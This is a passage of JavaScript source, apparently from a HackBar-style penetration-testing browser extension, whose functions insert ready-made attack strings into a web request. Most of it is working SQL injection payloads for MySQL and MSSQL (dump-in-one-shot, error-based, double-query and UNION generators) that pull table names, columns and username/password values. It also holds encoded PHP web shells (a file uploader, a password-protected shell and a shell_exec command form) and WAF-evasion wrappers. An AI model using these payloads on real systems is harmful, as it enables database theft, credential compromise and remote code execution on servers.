2045.                     txt = "(select(!root-~0)from(select concat/**/(user(),version(),database(),0x3c62723e,@:=0,(select+count(*)+from+information_schema.columns where table_schema=database() and @:=concat/**/(@,table_name,0x3a3a3a3a3a,column_name,0x3c62723e)),@)root)z)";
2046.                     break;
2047.             case '16':
2048.                     txt = "and(select(!root-~0)from(select concat/**/(user(),version(),database(),0x3c62723e,@:=0,(select+count(*)+from+information_schema.columns where table_schema=database() and @:=concat/**/(@,table_name,0x3a3a3a3a3a,column_name,0x3c62723e)),@)root)z)";
2049.                     break;
2050.             case '17':
2051.                     txt = "and(select+if(x,6,9)*1E308+from(select(select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())x)x)";
2052.                     break;
2053.             case '18':
2054.                     txt = "and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)";
2055.                     break;
2056.             /*DIOS By MadBlood for MySQL Version < 5.5 */
2057.             case '19':
2058.                     txt = "+multipoint((select*from+(select+x*1E308+from+(select+concat(@:=0,(select+count(*)+from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)j))";
2059.                     break;
2060.             case '20':
2061.                     txt = "+multipoint((select*from(select(!x-~0)+from(select+concat(@:=0,(select(count(*))from(information_schema.tables)where(table_schema=database())and@:=concat(@,0x0b,table_name)),@)x)y)j))";
2062.                     break;
2063.             case '21':
2064.                     txt = "multipoint((select*from(select(x+is+not+null)-9223372036854775808+from+(select(concat(@:=0,(select+count(*)+from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@))x)y)j))";
2065.                     break;
2066.             case '22':
2067.                     txt = "'+and+multipoint((select*from(select!x-~0.from(select(select+group_concat(table_name+separator+0x0b)from(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+1,20)c)x)j)h))";
2068.                     break;
2069.             case '23':
2070.                     txt = " and extractvalue(0x0a,concat(0x0a,(select version())))";
2071.                     break;
2072.             case '24':
2073.                     txt = " and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))";
2074.                     break;
2075.             case '25':
2076.                     var dbName = prompt("Database Name","DATABASE()");
2077.                     var dbNameFinal = "0x";
2078.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
2079.                     else{            
2080.                         for (var i = 0; i < dbName.length; i++){
2081.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
2082.                         }
2083.                     }
2084.                     var tableName = prompt("Table Name", "table_name");                
2085.                     var tblNameHexed = "0x";
2086.                     for(var i=0;i<tableName.length;i++) {
2087.                         tblNameHexed += tableName.charCodeAt(i).toString(16);
2088.                     }
2089.                     txt = " and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=" + dbNameFinal +" and table_name=" + tblNameHexed + " limit 0,1)))";
2090.                     break;
2091.             case '26':
2092.                     var Db = prompt("Database Name","DATABASE()");
2093.                     var tableName = prompt("Table Name", "users");
2094.                     if(Db == ""){dbANDtable=tableName;}
2095.                     if(Db == "DATABASE()"){dbANDtable=tableName;}
2096.                     else{
2097.                     dbANDtable=Db + "." + tableName;                   
2098.                     }
2099.                     var columnName = prompt("Column Name", "username,password");
2100.                     txt = " and extractvalue(0x0a,concat(0x0a,(select concat(" + columnName + ") from " + dbANDtable + " limit 0,1)))";
2101.                     break;
2102.             case '27':
2103.                     txt = " and updatexml(null,concat(0x0a,(select version())),null)";
2104.                     break;
2105.             case '28':
2106.                     txt = " and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)";
2107.                     break;
2108.             case '29':
2109.                     var dbName = prompt("Database Name","DATABASE()");
2110.                     var dbNameFinal = "0x";
2111.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
2112.                     else{            
2113.                         for (var i = 0; i < dbName.length; i++){
2114.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
2115.                         }
2116.                     }
2117.                     var tableName = prompt("Table Name", "table_name");                
2118.                     var tblNameHexed = "0x";
2119.                     for(var i=0;i<tableName.length;i++) {
2120.                         tblNameHexed += tableName.charCodeAt(i).toString(16);
2121.                     }
2122.                     txt = " and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=" + dbNameFinal +" and table_name=" + tblNameHexed + " limit 0,1)),null)";
2123.                     break;
2124.             case '30':
2125.                     var Db = prompt("Database Name","DATABASE()");
2126.                     var tableName = prompt("Table Name", "users");
2127.                     if(Db == ""){dbANDtable=tableName;}
2128.                     if(Db == "DATABASE()"){dbANDtable=tableName;}
2129.                     else{
2130.                     dbANDtable=Db + "." + tableName;                   
2131.                     }
2132.                     var columnName = prompt("Column Name", "username,password");
2133.                     txt = " and updatexml(null,concat(0x0a,(select concat(" + columnName + ") from " + dbANDtable + " limit 0,1)),null)";
2134.                     break;
2135.                     /*MSSQL ERROR BASED*/
2136.             case '31':
2137.                     txt = " and 1=@@version()";
2138.                     break;
2139.             case '32':
2140.                     txt = " and 1=db_name()";
2141.                     break;
2142.             case '33':
2143.                     txt = " and 1=user";
2144.                     break;
2145.             case '34':
2146.                     txt = " and 1=(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(''))";
2147.                     break;
2148.             default:
2149.                     txt = "ERROR";
2150.                     break;
2151.         }      
2152.         hackBar.setSelectedText( txt );
2153.     },
2154.     /* DOUBLE QUERY FUNCTION */
2155.     DoubleQuery: function (choice)  {
2156.         var str = choice;
2157.         switch (str){  
2158.             case '1':
2159.                     txt = "+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1";
2160.                     break;  
2161.             case '2':
2162.                     txt = "+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1";
2163.                     break;    
2164.             case '3':
2165.                     var dbName = prompt("Database Name","DATABASE()");
2166.                     var dbNameFinal = "0x";
2167.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
2168.                     else{                
2169.                         for (var i = 0; i < dbName.length; i++){
2170.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
2171.                         }
2172.                     }
2173.                     txt = "+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=" + dbNameFinal + "+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1";
2174.                     break;      
2175.             case '4':
2176.                     var dbName = prompt("Database Name","DATABASE()");
2177.                     var dbNameFinal = "0x";
2178.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
2179.                     else{      
2180.                         for (var i = 0; i < dbName.length; i++){
2181.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
2182.                         }
2183.                     }
2184.                     var tblName = prompt("Table Name", "users");
2185.                     var tblNameHex = "";      
2186.                     for (var i = 0; i < tblName.length; i++){
2187.                       tblNameHex += tblName.charCodeAt(i).toString(16);
2188.                     }
2189.                     txt = "+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=" + dbNameFinal + "+AND+table_name=0x" + tblNameHex + "+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1";
2190.                     break;
2191.             default:
2192.                     txt = "ERROR";
2193.                     break;
2194.             case '5':
2195.            
2196.                     var Db = prompt("Database Name","DATABASE()");
2197.                     var tableName = prompt("Table Name", "users");
2198.                     if(Db == ""){dbANDtable=tableName;}
2199.                     if(Db == "DATABASE()"){dbANDtable=tableName;}
2200.                     else{
2201.                     dbANDtable=Db + "." + tableName;                   
2202.                     }
2203.                     var columnName = prompt("Column Name", "password");                  
2204.                    
2205.                     txt = "+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(" + columnName +"+AS+CHAR),0x27,0x7e)+FROM+" + dbANDtable + "+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1";
2206.                     break;
2207.         }                  
2208.         hackBar.setSelectedText( txt );
2209.       },
2210.     /* T.PRO GENERATE UNION (THX TO AJKARO FOR REPEAT NULL STRING FIX!!!)*/
2211.     UnionSelectGen: function (choice){     
2212.       var str = choice;
2213.       switch (str){                
2214.             case '1':  
2215.                 var amount = prompt( "Amount of columns to use in the UNION SELECT Statement", "10" );
2216.                 txt = " Union Select ";
2217.                 var strNull = 'null,';                 
2218.                 function multiString(text, count){ var ret = ""; for(var i = 0; i < count; i++){ret += text; }
2219.                     return ret;
2220.                   };
2221.                   var rep = multiString(strNull, amount);                    
2222.                   txt = txt + rep.substr(0, rep.length-1)+"";                      
2223.                   break;           
2224.          default: txt = "ERROR";
2225.                   break;                   
2226.       }        
2227.       hackBar.setSelectedText( txt );
2228.     },
2229.     selectionToUnion2: function ( encoding ){
2230.         var columns = prompt( "Amount of columns to use in the UNION ALL SELECT Statement", "10" );
2231.         columns = Math.min(1000, parseInt( columns ));
2232.         var colArray = new Array();
2233.         for ( var i = 0 ; i < columns ; i++ ) {
2234.           colArray.push( i+1 );
2235.     }
2236.     result = colArray.join( '),(' );
2237.     txt = "+UNION(SELECT(" + result + ")" + ")";   
2238.     hackBar.setSelectedText( txt );
2239.     },
2240.     /* SELECT QUERIES */
2241.     SelectQueries: function (choice)    {      
2242.         var str = choice;
2243.         switch (str){      
2244.             case '1':  txt = "(SELECT+CONCAT(COUNT(schema_name),0x202f20446174616261736573)+FROM+INFORMATION_SCHEMA.SCHEMATA)";        
2245.                     break;
2246.             case '2':  txt = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)";         
2247.                     break;         
2248.             case '3':                  
2249.                     txt = "(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)";
2250.                     break;
2251.             case '9':                  
2252.                     txt = "(select group_Concat(0x3c62723e,table_schema) from {f information_schema.tables} where table_name = 'admin')";
2253.                     break; 
2254.                 case '10':                 
2255.                     txt = "(select /*!50000group_Concat(*/table_schema) from {f information_schema.tables} where table_name = 'admin')";
2256.                     break;
2257.             case '4':                  
2258.                     txt = "(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)";
2259.                     break;
2260.             case '11':                 
2261.                     txt = "concat(0x636f756e743a20, (Select count(0) from admin))";
2262.                     break;
2263.             case '5':
2264.                     txt = "(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE())";
2265.                     break; 
2266.             case '6':
2267.                     var tblName = prompt("Table Name", "users");                   
2268.                     var tblNameHex = "";      
2269.                     for (var i = 0; i < tblName.length; i++){
2270.                       tblNameHex += tblName.charCodeAt(i).toString(16);
2271.                     }
2272.                     txt = "(/*!%53ELECT*/+/*!50000GROUP_CONCAT(column_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.COLUMNS*//**//*!%57HERE*//**//*!TABLE_NAME*//**/LIKE/**/0x" + tblNameHex + ")";
2273.                     break;
2274.             case '7':
2275.                     txt = "(/*!%53ELECT*/(@x)FROM(/*!%53ELECT*/(@x:=0x00),(@NR:=0),(/*!%53ELECT*/(0)/*!%46ROM*/(/*!%49NFORMATION_%53CHEMA*/./*!%54ABLES*/)/*!%57HERE*/(/*!%54ABLE_%53CHEMA*//**/NOT/**/LIKE/**/0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=/*!CONCAT%0a(*/@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,/*!%74able_%6eame*/,0x3c62723e))))x)";
2276.                     break; 
2277.             case '8':
2278.                     var tblName = prompt("Table Name", "users");                   
2279.                     var tblNameHex = "";      
2280.                     for (var i = 0; i < tblName.length; i++){
2281.                       tblNameHex += tblName.charCodeAt(i).toString(16);
2282.                     }
2283.                     txt = "(/*!%53ELECT*/+/*!50000GROUP_CONCAT(column_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.COLUMNS*//**//*!%57HERE*//**//*!TABLE_NAME*//**/LIKE/**/0x" + tblNameHex + ")";
2284.                     break;      }      
2285.         hackBar.setSelectedText( txt );
2286.       },
2287.     /* BASICS OTHER */
2288.     OtherBasics: function (choice)  {      
2289.         var str = choice;
2290.         switch (str){      
2291.             case '1':  
2292.                     var txt = hackBar.getSelectedText();
2293.                     if( txt == ''){
2294.                     var txt = "LPAD(str,2,0x30)";                  
2295.                     }else{
2296.                     var txt = "LPAD(" + txt + ",2,0x30)";                  
2297.                     };                             
2298.                     break;
2299.             case '2':  
2300.                     var txt = hackBar.getSelectedText();
2301.                     if( txt == ''){
2302.                     var txt = "REPEAT(str,count)";                 
2303.                     }else{
2304.                     var txt = "REPEAT(" + txt + ",5)";                 
2305.                     };                     
2306.                     break;         
2307.             case '3':
2308.                     var txt = hackBar.getSelectedText();
2309.                     if( txt == ''){
2310.                     var txt = "IF((CONDITION)>-1,0x00,0x00)";                  
2311.                     }else{
2312.                     var txt = "IF((" + txt + ")>-1,0x00,0x00)";                
2313.                     };                  
2314.                     break;
2315.             case '4':  
2316.                     var txt = hackBar.getSelectedText();
2317.                     if( txt == ''){
2318.                     var txt = "CASE+WHEN+(CONDITION)+THEN+1+ELSE+2+END";                   
2319.                     }else{
2320.                     var txt = "CASE+WHEN+(" + txt + ")+THEN+1+ELSE+2+END"; 
2321.                     };  
2322.                     break;
2323.             default:
2324.                     txt = "ERROR";
2325.                     break;                 
2326.         }      
2327.         hackBar.setSelectedText( txt );
2328.       },     
2329.     phpscripts: function (choice)   {
2330.     var str = choice;
2331.     switch (str){
2332.         case '1':
2333.                 txt = "0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e";
2334.                 break;
2335.         case '2':
2336.                 var password = alert(' Password = raz');
2337.                 txt = "0x3c3f706870a24735f3d27654e71565574464b777a415566522f7348364a37585a7a62524346746830777369744d48465747796c7a533557344e7055744c4d7259723964704e315a534a39304874656b707837376a6b4a43564f6279556d33457861326c4f41576965596c2b6b514a5a5738726f39654b5936616c4e715233757173413164744e4b697745614b6d567855756143566d53467a43634b726f2f4c4d51486b4f45773377626f713973524b6c2f62766f577470515a6f7677414a7a4471622f6578345630474c36796a326349773248417878383143687065436f64785a372f443143592b356366307175394e6f494d4b3053656b6834486e734579452f42484a673231417174694e4c71483839415361726677527a47587351656454376574326b547270614e764d7a315738476f7846534b6c534b5a3446784372666a56506d357553684d4a6a6f49737479566d49475642696c527641736564434c5673745138487a5138496a7a432b70787a517445525639586a35576c58484748754367624a672f436f316b7a435a524e46694d6236626f756662687a6c3675726d657a644230336d674767796a7966642b532b4d677a273ba6563686f28677a756e636f6d7072657373286261736536345f6465636f64652824735f2929293ba6572726f725f7265706f7274696e672830293ba6f625f737461727428293ba2f2f54494e59205348454c4c20207631204279207e7e52405a7e7ea24706173733d273833666533373462353331616363303837636130316232633635383435333839273b2f2f2044656661756c7420506173732069732072617a202020284368616e67652049742029a2473683d27654e727457473176347a59532f7077412b5138735431664a4238666162467373594676714f596d6342707533576b6d42765767684b4259644353744c676967356d797479763733444966566978386c757237312b757353577865484d63446a7a44446c6b7644435734512b47356c39647574653365683577726e2f73575a596d336e712f37753375634d5a356e4b552b4c344f694e486f6a49476d2b36376a75366556464c53445a6f657470622f6335663777775973355a615479543677375534547078774a51774c6f4142545143654d694957366659494f35355977686e382f6b7267723261365a2b5838495a5347506e574565566e3442637554594d344d33665030766d377166657a736a586232647257715349444c2b495974382f4952545a333934737875395a2b757236396359516e356b64436f4c484d2b4e45303661426e6b723338784f5866306a7833367a506e35786e47762f5a765a71663652444b5877667950626f514e31397346337232656e4679666f4179334f3054477434506e6c74654e506a6f396e304b3978567178597363616868717735466e4843724c62333671637265442b626f6e49526b6a543277614f477a6f4d463835645a7948534d4364466349466a30386f4b4b73497441644b6e544b5a566f304f3465533862426744446d6e2f7846775a6a50637845434f71433945644634374f6346573853666753556f69754452495071683369663665337965342f4d456e396634645044354c33782b4f4e524a62365464425a79422b4d476274392b5074486b4365494c574d6b344e734c37734a646d396f617a6f452b54747763733871314b41576a4e386a2b7954413944463433387a692b63465343344d2f6538486737634c4865565167556e79374d46414a58303545734269514854344833546d63697637774c7346573259723567736e742f6774524c50322f5670734f743758324370494c4142746e484e51466a46654a34626f41447743783263326c38422b7a674e64794c4e6148337256444d334375477a70324254304b67325767762b66655a5437324444305142654f79533336625872483839477a4a78317079302b516c4b3036624459516b6c6d4e4e4a58502b4735683867306f4a7353476d45424f73567a546955324a2b59706267456c2f586855465330752f4170526a76724e356c4a48786550782b4d727559374f324f6f384b324c4d3837444867384a394d716e5a65774d48485474437a524e623644727a6b484461797733512f757458502b6e364630414d7832684e33777659486743446f5878436b416d4c674377454f45697143354d73644f72345971335154784b496c424d524c6a48416a494f4a6b3635507a79324c45775463626d6f533137504d386242795143374667555166456a2b7879583144374c37724f71484a7542625a71314f654e4656697a4a6b705652466c6f553345424a67504f797841706d7578464c45754a412b49637951754d347a6175536c4938353547584a50674f2f6d4b46464255536f7664624e7137736c6a4573415942553048636c686968472f4e4b34444d676241742f66465959487879384e574a6676616b59384b4670534d484d6646384d5642455667626f305a78474c4b303568443974514749793964746c494e756d4d6741594d6938724a49797a6d4837773937394d436744326b77677a336737412f6f3361742f6b535261455a417078332b5938675966617967705a587a66747075615270676e67495a77563047754c425a5255666b78507a7743586b34764a69544d54795545774f3872674c6d48774931346a425651306b6c7a4944494850324951753058334d456c617970766c4c7a4236517436453459726c5a6f36417146334b6f6f56797859696b6272306538546f576a4b456a765a6553464c53384676784e616a4f7a7267555764644d314e384e33627854566c625548443071473374777372326a794351525246726c34677a594a3552497a374a4c737a3644396f6a77536359484a7a4b61506c4d4632785534454673495162376161547764346d474a484255444b3950746e2f58696a584672684849525665444c6c69634e6f7a63514f734755427841587463614d686d2f304256597172586c76756c58493633436143322f747665674a4c7a51377057626347336c5a45767750566563536b58345a37584749387a4a75533538776a42446f4a4c4e35566f432b31364e5a534c345572574b4b6a713232626a73435542555268417645424d474e445274616d6e324b356e686e76303739447a676a3043394c3944433236357a37574952486c566930695a66656c316d59466265435332366d35344649726e5354786b48502f762b622f61382f43706b774f58697a386a4e78727a54616d7547357576694d73533566397758466f74396d584f306d6236384958566d63334c7248683830615176632f784a634f34347035337356305034662b4f71763878503467504d58516c5462764630625666726e46686779307044416d68394b474a6b58652f74414c644b6b7a6a39394b776259374a446941506a47565457434f472b3357576a765936426e537341555a4f3474376f73654d54705777326d6c557435344e3167754e57687778636250683452674c4553664f4b6b686f65594c514b53575979765a6f4647795834577176304c74505937353551713738354c2b7447394f5470795848643663336232676478636e56314f6a70316a756e56616f755a7570384a6b6f53744b414647312b364b746546416131527355713745494b3338345565446d3739487650477172516a6b6b6c31554a4263302b324b64554471696f58394c5370716f63365a67416859347959556538512f32414a546e656c327a7772745a514141564e4b4647773673526645365757465a584c424f724c75497a68444370366654796767516c41355931456655594474494a5541427168356e6a674d4a2b33503367554475574a6544393438385a54785a75486c527a4d4659634278436f784143335a4d425a58395332516c665157503641425043344d356a6d62783045796a344a697139464b5567464547643474545430733572326d4f76556f5745704848573552507172436534332b7836652f4d55696e7050565554657656526131487366716567476663594d573874726f314f3761424a3945486350546b6e646d6a337a714a4b65384a68534871646735384b70774e4d46356b734b41707762372b6f45735561796c37384a58584e363471316e534e56425975554a73686c66596261586c7a734c4f4463395a6c4c6f44447367494f4348416f54326c377843444857636f474b6750414f385330645946757641376355566456323155564c4f77716d67627744463955745a676e4761394e565a6d326d664c71326b4d6d4844595572552f6576487633726b2f4b6f6b4a5a61513646565a366377774a453647626d3467375558585752304b4858577942704e4d6e3967734443674577447571394f617548472f746c647a3042424b3371526c515276524d6c514e3759766176574e5531776a6f726b7944686b4550487555643745524c422b734d50516b6d7763695734623641506642316d2b3149553163494e5071632f4c472b646d2b436a6933316b397934694c35495376432b74776e327138666c552b794a685645564a392b413174784753453d273ba6576616c28677a756e636f6d7072657373286261736536345f6465636f6465282473682929293ba3f3ea3c68723e3c68723e3d3d3d3d3d3d3d3d3d3d5468616e6b7320466f72205573696e672e3d3d3d3d3d3d3d3d3d3d3d3d3c2f626f64793ea3c2f68746d6c3e";
2338.                 break;
2339.         case '3':
2340.                 txt = "<?php $a = base64_decode('PD9waHAgZWNobyAnVXBsb2FkZXI8YnI+JztlY2hvICc8YnI+JztlY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfX0/Pg==');$file = fopen('up.php','w');echo fwrite($file,$a);fclose($file);?>";
2341.                 break;
2342.         case '4':
2343.                 txt = "0x3c63656e7465723e203c68313e4578656375746520636f6d6d616e64733c2f68313e203c666f726d206d6574686f643d22504f53542220616374696f6e3d22223e203c696e70757420747970653d227465787422206e616d653d22636d642220706c616365686f6c6465723d224578656375746520436f6d6d616e6473223e203c696e70757420747970653d227375626d6974222076616c75653d223e3e223e203c2f666f726d3e203c3f7068702024636d64203d20245f504f53545b27636d64275d3b202465786563203d207368656c6c5f65786563282224636d6422293b206563686f20223c746578746172656120726f77733d2731352720636f6c733d273835273e24657865633c2f74657874617265613e223b203f3e";
2344.                 break;
2345.         }      
2346.         hackBar.setSelectedText( txt );
2347.       },
2348.     /* T.PRO WAF CALCULATE  */
2349.     CalcWaf: function (choice)
2350.       {
2351.         var txt = hackBar.getSelectedText();               
2352.         var str = choice;
2353.         switch (str){
2354.             case '1': txt = txt.replace(/ /g, "/**/");
2355.                 txt= ("/*!" + txt + "*/");
2356.                     break;
2357.             case '2': txt = txt.replace(/ /g, "+");
2358.                 txt= ("/*!50000" + txt + "*/");
2359.                     break;
2360.             case '3': txt = txt.replace(/ /g, "+");
2361.                 txt= ("/*!12345" + txt + "*/");
2362.                     break;
2363.             case '4': txt = txt.replace(/ /g, "+");
2364.                 txt= ("/*!13337" + txt + "*/");
2365.                     break; 
2366.             case '7': txt = txt.replace(/ /g, "+");
2367.                 txt= ("/*!00000" + txt + "*/");
2368.                     break;
2369.             case '8': txt = txt.replace(/ /g, "+");
2370.                 txt= ("/*!56000" + txt + "*/");
2371.                     break;     
2372.             case '5': var txt = txt.toLowerCase();
2373.                 String.prototype.insert = new Function('intPos','strIns','return this.substring(0,intPos) + strIns + this.substring(intPos,this.length);');    
2374.                 var input2val = txt.toUpperCase();  
2375.                 txt = (txt.insert(2,input2val));
2376.                 txt = txt.replace(/ /g, "/*&a=*/");
2377.                     break;
2378.         // SETS
2379.         case '6': var txt = txt.toLowerCase();
2380.                 String.prototype.insert = new Function('intPos','strIns','return this.substring(0,intPos) + strIns + this.substring(intPos,this.length);');    
2381.                 var input2val = txt.toUpperCase();  
2382.                 txt = (txt.insert(2,input2val));
2383.                 txt = txt.replace(/ /g, "/*&a=*/");
2384.                     break;
2385.         }      
2386.         hackBar.setSelectedText( txt );
2387.       }
2388. }